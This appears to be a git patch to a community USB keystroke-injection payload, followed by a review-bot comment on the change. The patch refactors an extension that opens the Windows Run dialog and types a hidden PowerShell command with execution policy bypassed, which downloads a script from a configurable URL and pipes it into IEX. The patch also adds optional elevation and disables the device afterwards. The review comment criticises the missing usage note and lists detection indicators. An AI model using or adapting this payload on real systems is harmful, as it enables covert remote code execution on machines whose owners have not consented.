From 52f6bdbc6f53605fee64784686b370afdc9a20f3 Mon Sep 17 00:00:00 2001 From: PlumpyTurkey <157210867+PlumpyTurkey@users.noreply.github.com> Date: Fri, 12 Jul 2024 16:41:39 +0200 Subject: [PATCH] Uses a function instead of executing directly --- .../community/RUN_HOSTED_POWERSHELL | 30 ++++++++++--------- 1 file changed, 16 insertions(+), 14 deletions(-) diff --git a/payloads/extensions/community/RUN_HOSTED_POWERSHELL b/payloads/extensions/community/RUN_HOSTED_POWERSHELL index 5c15895..33b422f 100644 --- a/payloads/extensions/community/RUN_HOSTED_POWERSHELL +++ b/payloads/extensions/community/RUN_HOSTED_POWERSHELL @@ -2,9 +2,9 @@ EXTENSION RUN_HOSTED_POWERSHELL REM_BLOCK DOCUMENTATION Title: Run Hosted PowerShell Author: PlumpyTurkey - Description: This extension executes a hosted PowerShell script using the Windows Run dialog box. + Description: This extension allows you to run a hosted PowerShell script using the Windows Run dialog box. Target: Windows 10, 11 - Version: 1.0 + Version: 1.1 END_REM REM Required options: @@ -15,20 +15,22 @@ EXTENSION RUN_HOSTED_POWERSHELL DEFINE #RHP_ELEVATED_EXECUTION FALSE DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE - GUI r + FUNCTION RHP_RUN() + GUI r - DELAY #RHP_DELAY - STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX" - - IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION - CTRL SHIFT ENTER DELAY #RHP_DELAY - LEFT - END_IF_DEFINED + STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX" - ENTER + IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION + CTRL SHIFT ENTER + DELAY #RHP_DELAY + LEFT + END_IF_DEFINED - IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION - ATTACKMODE OFF - END_IF_DEFINED + ENTER + + IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION + ATTACKMODE OFF + END_IF_DEFINED + END_FUNCTION END_EXTENSION
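Review bot: The header shown in the first hunk never states that the extension must now be invoked explicitly. The second hunk moves the whole keystroke sequence into `FUNCTION RHP_RUN()`, so a payload written against 1.0 that only includes the extension silently does nothing under 1.1, while the header merely rewords the Description and bumps the version. I would add a line to the REM_BLOCK such as `Usage: define #RHP_SCRIPT_URL, then call RHP_RUN() from the payload`, and mention the behaviour change next to the version number. The option list after `REM Required options:` lies outside the hunk, so this may already be covered there. The typed command itself is unchanged apart from indentation, so defensive telemetry for 1.0 still applies to 1.1: a Run-dialog launch of PowerShell with a hidden window, `-EX Bypass`, and a web request piped into `IEX`.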